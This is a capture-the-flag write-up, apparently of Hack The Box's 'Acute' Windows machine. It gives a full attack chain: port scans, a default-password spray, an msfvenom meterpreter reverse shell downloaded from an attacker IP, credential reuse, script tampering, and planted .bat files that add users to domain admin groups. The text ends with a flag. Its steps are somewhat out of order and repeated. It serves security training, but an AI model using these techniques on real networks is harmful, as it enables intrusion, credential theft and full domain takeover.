Acute
nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Wed Feb 16 14:29:52 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.27s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
443/tcp open https
Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Feb 16 14:31:33 2022 -- 1 IP address (1 host up) scanned in 101.32 seconds
Now that is strange just one port which is 443 HTTPS
.
nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
# Nmap 7.91 scan initiated Wed Feb 16 14:29:26 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_ssl-date: 2022-02-16T16:29:37+00:00; +2h59m36s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2h59m35s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 16 14:30:03 2022 -- 1 IP address (1 host up) scanned in 36.87 seconds
Now that is interesting let add atsserver.acute.local 10.10.14.145
to /etc/hosts
now let see what we have running on the webpage.
Now what do we have let try looking around to see what we can get maybe hint or anything that can be useful to further our enumeration forawrd.
Now we can use that to create some userlist maybe it can useful.
Awallace
Chall
Edavies
Imonks
Jmorgan
Lhopkins
Now that New Starter Forms
look interesting let click on it.
So we downloaded a doc file let check it and see what we have in it.
Seems like a checklist interesting right now that is promising.
Arrange for the new starter to meet with other staff in the department as appropriate. This could include the Head of Department and/or other members of the appointee’s team. Complete the remote training.
Now that is cool i click on the remote
which i got transfer to a staff
webpage which is a Windows PowerShell Web Access
ahhh nice.
https://atsserver.acute.local/Acute_Staff_Access/
Since we already know the default password for new staff which is Password1!
let try to get the computer name back to the doc let check if we have anything hidden on it with exiftool
.
Now we have the Computer name
let the password with all the userlist we compile.
I was able to get in with edavies
login in to Acute-PC1 now time to enumerate the system more to see what we can loot. So the best thing o do now is to get a proper reverse shell back to our terminal.
└─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.13 LPORT=1337 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of exe file: 206848 bytes
Then, we open up Msfconsole and configure our listener. use exploit/multi/handler set lhost tun0 set lport 1337 set payload windows/meterpreter/reverse_tcp run
Now we use msfvenom
to generate a payload file to get a reverse shell now let find writable folder on the target.
Found a writable folder let transfer our payload.
Invoke-WebRequest "http://10.10.14.52:8000/shell.exe" -OutFile "shell.exe"
Now let start our listener before executing our payload.
Now let click on run and execute the payload on the target.
Now that we a meterpreter shell let use the screenshare
command to see what has taken place on the target
We can confirm the streaming on browser.
Now we just need to create the same object and use Invoke-Command
to execute commands has user imonks
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred
Then, we execute the wm.ps1 script and re-check the local administrators group to see if we have achieved our goal.
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1} -Credential $cred
The command completed successfully.
PS C:\utils>
.
PS C:\utils> net localgroup Administrators
net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\edavies
ACUTE\jmorgan
Administrator
The command completed successfully.
PS C:\utils>
Indeed, edavies is now a local administrator on Acute-PC01 .
Note: For the administrator permissions to take effect logging off and logging back in as edavies on the PSWA session is required.
.
Now boom we can execute command has imonks
now let enumerate more.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /users} -credential $cred
We have more users to enumerate let hit it.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /users/imonks/desktop} -credential $cred
We end up with the following chain of commands:
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock {((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','net localgroup administrators edavies /add') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-Content c:\users\imonks\Desktop\wm.ps1} -credential $cred
Boom we have user.txt
also seems we have a powershell script let cat
it to see what we have inside.
Now that scripts look promising seems it a script that contain jmorgan
password we can see it in the object it possible to execute command has jmorgan
if we run the script. So what we need to do is edit Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
remove Get-Volume
and add a path to our reverse shell executable file.
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock{((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\rev.exe') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred
Now we can execute it with invoke-command
again.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1} -credential $cred
Now back to check our listener.
Boom we shell has jmorgan
cool now let check which localgroup jmorgan
is on.
Now we know jmorgan
is part of administrator group we can dump the hashes.
Now let crack the administrator
hash .
But the issue is when i try to use on the administrator
it a dead end so let try password reuse on each users we know we have no access to yet use powershell script just like the first time setting object and using the invoke-command
.
A flashback if i can remember we found some new users ATSSERVER
why not let give it a try with the usernames.
$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred
Boom work for user awallace
more enumeration now.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /"program files"} -credential $cred
Now that folder look strange and interesting keepmeon
let check what we have in it.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /"program files"/keepmeon} -credential $cred
Now we have a bat
file let cat
to see what the keepmeon.bat
doing.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {cat /"program files"/keepmeon/keepmeon.bat} -credential $cred
Now that seems like a job keep running every 5min just like a cronjob
in linux probably these one is scheduled to run every 5 min which is cool i guess.
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
Let me break it down any file ending with .bat
would run every 5 min since we are in the keepmeon
folder so it possible to create a payload in a bat
format which can give access to lois
now back to the doc file we got first.
**Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin. **
Now let add user awallace
to the group of site_admin
and wait for 5min to confirm it.
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}
Now we can confirm if user awallace
is now part of site_admin
group.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {net group site_admin} -credential $cred
Now we are part of site_admin
group time to get the root.txt
flag.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /users/administrator/desktop} -credential $cred
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {cat /users/administrator/desktop/root.txt} -credential $cred
.
PS C:\utils> $passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force $passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd) $cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd) PS C:\utils> invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred acute\awallace PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-ChildItem 'C:\Program Files\Keepmeon\'} -Credential $cred Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-ChildItem 'C:\Program Files\Keepmeon\'} -Credential $cred Directory: C:\Program Files\Keepmeon Mode LastWriteTime Length Name PSComputerName ---- ------------- ------ ---- -------------- -a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER PS C:\utils>
.
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-Content 'C:\Program Files\Keepmeon\keepmeon.bat'} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-Content 'C:\Program Files\Keepmeon\keepmeon.bat'} -Credential $cred
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
PS C:\utils>
.
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
The command completed successfully.
PS C:\utils>
It seems like the site_admin group has access to the Domain Admins group which is our final goal.
So, let’s try to create a script that when Lois executes it, through the keepmeon.bat script, imonks will be
added to the site_admin group.
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred
PS C:\utils>
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred Group name Site_Admin Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group Members ------------------------------------------------------------------------------- The command completed successfully. PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-childitem 'c:\program files\Keepmeon\'} -Credential $cred Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-childitem 'c:\program files\Keepmeon\'} -Credential $cred Directory: C:\program files\Keepmeon Mode LastWriteTime Length Name PSComputerName ---- ------------- ------ ---- -------------- -a---- 09/09/2022 13:43 42 imonks.bat ATSSERVER -a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER PS C:\utils>
After 5 minutes or so, we check, once more, the members of the site_admin group to make sure that
imonks was successfully added.
Now, according to our enumeration imonks is able to add himself to the Domain Admins group.
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)
.
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd) $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd) PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" imonks /add /domain} -Credential $cred Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" imonks /add /domain} -Credential $cred System error 5 has occurred. + CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError + PSComputerName : ATSSERVER NotSpecified: (:String) [], RemoteException Access is denied. NotSpecified: (:String) [], RemoteException PS C:\utils>
.
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" /domain} -Credential $cred Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" /domain} -Credential $cred Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator The command completed successfully. PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-content C:\Users\Administrator\Desktop\root.txt} -Credential $cred Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-content C:\Users\Administrator\Desktop\root.txt} -Credential $cred 91ac558b60398bde3b9fe9d00f7767da PS C:\utils>
.